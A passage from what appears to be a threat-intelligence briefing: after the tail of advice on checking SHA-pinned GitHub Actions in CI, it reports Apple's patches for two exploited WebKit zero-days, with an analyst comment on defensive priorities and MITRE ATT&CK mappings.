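Run it over `.github/workflows/*.yml` in CI and fail the build on any finding. A SHA pin is necessary but not sufficient: the pinned commit still has to be reviewed, and a composite action's own nested `uses:` lines need the same treatment, which this line-oriented check does not follow into other repositories.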

Apple Patches Two Actively Exploited WebKit Zero-Days

(published: December 13, 2025)

Apple released urgent security updates on December 13 for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and Safari to address two zero-day WebKit vulnerabilities that have been exploited in the wild against targeted users. The flaws, CVE-2025-43529 (use-after-free leading to arbitrary code execution) and CVE-2025-14174 (memory corruption), were actively abused in sophisticated attacks, and one of them had already prompted a Google Chrome patch days earlier. These flaws affect WebKit, the browser engine used by Safari and by the third-party browsers on iOS and iPadOS that are built on it, broadening the potential impact surface. Apple’s security release is part of a series of patches this year that have addressed at least nine exploited zero-days. Users and administrators are strongly advised to update devices immediately to mitigate ongoing threats.

Analyst Comment: This activity fits a broader shift defenders should not ignore. As Apple platforms continue to grow in enterprise and executive use, they are drawing sustained attention from capable threat actors who favor high-impact, low-noise entry points like browser engines. WebKit’s shared role across iOS, iPadOS, macOS and the browsers built on it amplifies the payoff of a single exploit, which helps explain the rising number of Apple zero-days seen in active attacks this year. Windows still dominates overall malware volume, but Apple is increasingly targeted where precision matters. For defenders, this reinforces two priorities: treat Apple patching with the same urgency as Windows, and monitor browser-driven activity as a primary initial access vector, not a secondary concern.

MITRE ATT&CK: T1189 - Drive-by Compromise | T1203 - Exploitation for Client Execution

Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.
